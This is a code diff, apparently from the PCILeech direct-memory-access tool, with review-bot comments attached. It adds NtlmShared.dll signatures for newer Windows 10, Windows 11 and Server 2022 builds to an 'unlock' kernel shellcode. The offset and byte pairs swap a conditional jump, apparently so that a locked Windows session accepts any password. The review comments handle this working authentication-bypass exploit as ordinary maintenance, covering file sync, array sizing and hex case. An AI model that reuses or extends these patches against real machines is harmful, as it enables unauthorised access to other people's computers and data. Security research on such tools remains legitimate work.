diff --git a/files/unlock_win10x64.sig b/files/unlock_win10x64.sig
index c2639a0..e4ae1e3 100644
--- a/files/unlock_win10x64.sig
+++ b/files/unlock_win10x64.sig
@@ -34,4 +34,20 @@
 741,32C0E904FBFFFF,741,32C0E904FBFFFF,741,B001E904FBFFFF
 #
 # signature for Windows 10 x64 [NtlmShared.dll (2019-12-07)/10.0.19041.1]
-426,48FF155320,435,0F84BAFAFFFF,435,0F85
\ No newline at end of file
+426,48FF155320,435,0F84BAFAFFFF,435,0F85
+#
+# signature for Windows 10 x64 [NtlmShared.dll (2022-08-04)/10.0.19041.1889]
+4B6,48FF15C31F,4C5,0F84BAFAFFFF,4C5,0F85
+#
+# signature for Windows Server2022 x64 [NtlmShared.dll (2022-08-04)/10.0.20348.887]
+A6E,48FF15B328,A7D,0F84B2FAFFFF,A7D,0F85
+#
+# signature for Windows 11 x64 [NtlmShared.dll (2021-06-05)/10.0.22000.1]
+F8B,488BCB48FF,F9D,0F84B2FAFFFF,F9D,0F85
+#
+# signature for Windows 11 x64 [NtlmShared.dll (2022-08-04)/10.0.22000.856]
+00B,488BCB48FF,01D,0F84B2FAFFFF,01D,0F85
+#
+# signature for Windows 11 x64 [NtlmShared.dll (2022-08-05)/10.0.22621.382]
+# signature for Windows 11 x64 [NtlmShared.dll (2022-09-27)/10.0.22621.608]
+FBD,48FF153C23,FCC,0F85C4FAFFFF,FCC,0F85
diff --git a/includes/lib64/vmm.lib b/includes/lib64/vmm.lib
index f4dcf22..65a45e9 100644
Binary files a/includes/lib64/vmm.lib and b/includes/lib64/vmm.lib differ
diff --git a/includes/vmmdll.h b/includes/vmmdll.h
index 63f2931..a572dd2 100644
--- a/includes/vmmdll.h
+++ b/includes/vmmdll.h
@@ -186,6 +186,7 @@ VOID VMMDLL_MemFree(_Frees_ptr_opt_ PVOID pvMem);
 #define VMMDLL_OPT_CORE_VERBOSE_EXTRA 0x4000000300000000 // RW
 #define VMMDLL_OPT_CORE_VERBOSE_EXTRA_TLP 0x4000000400000000 // RW
 #define VMMDLL_OPT_CORE_MAX_NATIVE_ADDRESS 0x4000000800000000 // R
+#define VMMDLL_OPT_CORE_LEECHCORE_HANDLE 0x4000001000000000 // R - underlying leechcore handle (do not close).
 #define VMMDLL_OPT_CORE_SYSTEM 0x2000000100000000 // R
 #define VMMDLL_OPT_CORE_MEMORYMODEL 0x2000000200000000 // R
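Review bot: The five entries added to this .sig block are a hand-maintained copy of the same offsets and bytes the commit adds to the oSigs table in pcileech_shellcode/wx64_unlock.c, and neither file records that coupling, so the next signature added to one of them can silently miss the other. A comment at the head of the block would make the dependency visible to the next editor, e.g. `# NOTE: keep in sync with the oSigs table in pcileech_shellcode/wx64_unlock.c (and NUMBER_OF_SIGNATURES there)`. The entries themselves match the C table byte for byte as far as this hunk shows.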
diff --git a/pcileech_shellcode/wx64_unlock.c b/pcileech_shellcode/wx64_unlock.c
index ff433ed..509387f 100644
--- a/pcileech_shellcode/wx64_unlock.c
+++ b/pcileech_shellcode/wx64_unlock.c
@@ -129,7 +129,7 @@ NTSTATUS Unlock_FindAndPatch(_In_ PKERNEL_FUNCTIONS2 fnk2, _Inout_ PBYTE pbPages
 return E_FAIL;
 }
-#define NUMBER_OF_SIGNATURES 15
+#define NUMBER_OF_SIGNATURES 20
 NTSTATUS Unlock(_In_ QWORD qwAddrNtosBase)
 {
 SIGNATURE oSigs[NUMBER_OF_SIGNATURES] = {
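Review bot: `NUMBER_OF_SIGNATURES` is bumped by hand from 15 to 20 while `oSigs` keeps that macro as its explicit array size, so the two can drift without any diagnostic: a count larger than the initializer list still compiles and leaves the trailing entries zero-filled, and those all-zero signatures are presumably then fed to the matcher (how it treats a zero-length chunk is outside this hunk). If the macro is only expanded inside `Unlock` after the declaration, deriving it from the array removes the manual step: `SIGNATURE oSigs[] = {` together with `#define NUMBER_OF_SIGNATURES (sizeof(oSigs) / sizeof(oSigs[0]))`. Any use of the macro outside `Unlock` would need to stay a literal; `Unlock`'s body continues past this hunk.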
@@ -223,7 +223,38 @@ NTSTATUS Unlock(_In_ QWORD qwAddrNtosBase)
 {.cbOffset = 0x426,.cb = 5,.pb = { 0x48, 0xff, 0x15, 0x53, 0x20 } },
 {.cbOffset = 0x435,.cb = 6,.pb = { 0x0f, 0x84, 0xba, 0xfa, 0xff, 0xff } },
 {.cbOffset = 0x435,.cb = 2,.pb = { 0x0f, 0x85 } } }
- }
+ },
+ // Windows 10 x64 [NtlmShared.dll (2022-08-04)/10.0.19041.1889]
+ {.chunk = {
+ {.cbOffset = 0x4B6,.cb = 5,.pb = { 0x48, 0xff, 0x15, 0xc3, 0x1f } },
+ {.cbOffset = 0x4c5,.cb = 6,.pb = { 0x0f, 0x84, 0xba, 0xfa, 0xff, 0xff } },
+ {.cbOffset = 0x4c5,.cb = 2,.pb = { 0x0f, 0x85 } } }
+ },
+ // Windows Server2022 x64 [NtlmShared.dll (2022-08-04)/10.0.20348.887]
+ {.chunk = {
+ {.cbOffset = 0xa6e,.cb = 5,.pb = { 0x48, 0xff, 0x15, 0xb3, 0x28 } },
+ {.cbOffset = 0xa7d,.cb = 6,.pb = { 0x0f, 0x84, 0xb2, 0xfa, 0xff, 0xff } },
+ {.cbOffset = 0xa7d,.cb = 2,.pb = { 0x0f, 0x85 } } }
+ },
+ // Windows 11 x64 [NtlmShared.dll (2021-06-05)/10.0.22000.1]
+ { .chunk = {
+ {.cbOffset = 0xf8b,.cb = 5,.pb = { 0x48, 0x8b, 0xcb, 0x48, 0xff } },
+ {.cbOffset = 0xf9d,.cb = 6,.pb = { 0x0f, 0x84, 0xb2, 0xfa, 0xff, 0xff } },
+ {.cbOffset = 0xf9d,.cb = 2,.pb = { 0x0f, 0x85 } } }
+ },
+ // Windows 11 x64 [NtlmShared.dll (2022-08-04)/10.0.22000.856]
+ { .chunk = {
+ {.cbOffset = 0x00b,.cb = 5,.pb = { 0x48, 0x8b, 0xcb, 0x48, 0xff } },
+ {.cbOffset = 0x01d,.cb = 6,.pb = { 0x0f, 0x84, 0xb2, 0xfa, 0xff, 0xff } },
+ {.cbOffset = 0x01d,.cb = 2,.pb = { 0x0f, 0x85 } } }
+ },
+ // Windows 11 x64 [NtlmShared.dll (2022-08-05)/10.0.22621.382]
+ // Windows 11 x64 [NtlmShared.dll (2022-09-27)/10.0.22621.608]
+ { .chunk = {
+ {.cbOffset = 0xFBD,.cb = 5,.pb = { 0x48, 0xff, 0x15, 0x3c, 0x23 } },
+ {.cbOffset = 0xFCC,.cb = 6,.pb = { 0x0f, 0x85, 0xc4, 0xfa, 0xff, 0xff } },
+ {.cbOffset = 0xFCC,.cb = 2,.pb = { 0x0f, 0x85 } } }
+ },
 };
 KERNEL_FUNCTIONS2 fnk2;
 PPHYSICAL_MEMORY_RANGE pMemMap, pMM;
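Review bot: The new entries mix hex case and brace spacing inside one table — `0x4B6` beside `0x4c5`, `0xFBD`/`0xFCC` beside `0xa6e`/`0xf8b`, and `{.chunk = {` in the first two entries versus `{ .chunk = {` in the last three — while the existing context lines above use lowercase hex throughout. Normalizing to the existing form keeps the table consistent and searchable, e.g. `{.cbOffset = 0x4b6,.cb = 5,.pb = { 0x48, 0xff, 0x15, 0xc3, 0x1f } },` and `{.cbOffset = 0xfbd,.cb = 5,.pb = { 0x48, 0xff, 0x15, 0x3c, 0x23 } },` with `{.chunk = {` on every entry. The `{.chunk` line of the existing 19041.1 entry is above this hunk, so the brace convention is inferred from the first two new entries; `Unlock` starts before and ends after this hunk.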